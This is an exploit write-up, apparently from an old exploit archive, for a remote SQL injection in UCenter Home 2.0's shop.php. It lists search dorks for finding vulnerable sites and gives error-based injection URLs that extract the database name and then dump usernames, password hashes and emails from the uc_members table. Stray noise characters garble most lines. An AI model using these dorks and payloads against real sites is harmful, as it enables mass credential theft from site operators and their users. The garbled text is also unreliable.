# U% c3 g. j3 I1 Q3 z8 D
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
$ A0 D+ k7 X8 Z5 R
, U. L# ~& M1 b. h
# ]" f7 r0 ~+ ~" w) ^6 O0 n+ e$ V
4 q* u3 g' h& e" F3 [8 |+ @ m*/ Author : KnocKout 0 a" {5 C! |/ h2 g+ I; ]
" I7 H( s5 Q6 W6 U*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers j# D/ `7 ?8 E4 x Q3 S( C* `
" O7 W L# T1 b4 H0 G: N
*/ Contact: knockoutr@msn.com % j8 b# h9 I7 q" h, q$ T/ ?$ z3 H
7 G/ W; g1 C5 j! C: s7 p. ?, b
*/ Cyber-Warrior.org/CWKnocKout
4 `9 f# U9 D2 G1 J! M( E( G! d' ~5 L
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
7 o! m& J, a$ h9 ]: f! I
' v3 t p9 |5 V# K# K% TScript : UCenter Home / O" G, L3 V( x! Y1 E& K+ p2 A
' D5 v. b' S \5 DVersion : 2.0 9 f8 X+ c3 f T+ ?/ N1 X% ^9 y
2 @, x) I: L- h4 i: ~# ?! e1 V1 j5 x3 {Script HomePage : http://u.discuz.net/ & ?. F) _+ J! G0 X% v6 Q# G
3 y; v& U4 `% }$ V& v7 }, q) I
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
9 _. l7 f8 z: W
& Z5 N; F Q, K+ JDork : Powered by UCenter inurl:shop.php?ac=view / M5 G/ K6 L# E7 K) `/ }
% Q5 m1 v0 o& z6 F, ]4 h) [$ e# W
Dork 2 : inurl:shop.php?ac=view&shopid= + o% e9 E9 l* g0 J& @9 J" q
4 b+ Z, f, c) [7 B
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
" I+ A9 T4 B6 {: s( y3 u8 n. Q" N( ]* j
9 a3 w: r N5 _Vuln file : Shop.php 2 V( Q$ G0 o4 A8 g* i
4 R, M3 q9 W. }8 H2 A; i( H1 X
value's : (?)ac=view&shopid= $ S0 B" c/ h! r, x! E9 G3 r/ l
& ~, |/ m) g; O9 w, L( b
Vulnerable Style : SQL Injection (MySQL Error Based) + s5 ]1 S2 r3 N0 Y, E5 J* D; Z! q2 e
, e1 N+ W6 x0 [3 x
Need Metarials : Hex Conversion 8 o4 }, E* F/ ]: X! k
# b. k/ d8 f& S( A; j
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
1 X8 f9 D/ J5 l& C4 m3 ?
( \* X" B. E( j& Z" b% n2 dYour Need victim Database name.
7 P5 o) E2 j* w4 \7 r) s! Z2 o9 S* r9 ^* K/ K- p+ b
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 2 M3 f8 M, b9 p8 r4 @5 l' S, W+ s
4 l- H: L3 x* f* I( T0 Y. R
..
! h6 w# k; z9 F& ]. G! t2 F2 G
$ H: J+ I* V5 d0 U2 K0 RDB : Okey. 3 _7 v, z8 }" F0 F* E% C! B
( e; r3 W4 K* t, U) ?9 H( U- ?6 v7 U# }your edit DB `[TARGET DB NAME]`
% j+ A# }! G0 t: @8 I
" @& s: m( |7 G; E# P; B- F/ XExample : 'hiwir1_ucenter'
- ]' [2 X& w: j( ` \" O# W$ b6 ^0 {( ~! Y
Edit : Okey.
' Z6 R0 z# k. V+ B0 l/ n
9 x6 ?- T3 ^" b5 \4 V) }# mYour use Hex conversion. And edit Your SQL Injection Exploit..
7 n% g: \+ t3 N f! u/ A e3 ^; }: M) f# v' G3 j5 `
+ {( ]% V) @3 ]8 F8 I6 q/ X. E7 b" i1 ~1 ~" T; b& n
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
# J) E; w) |* T4 u |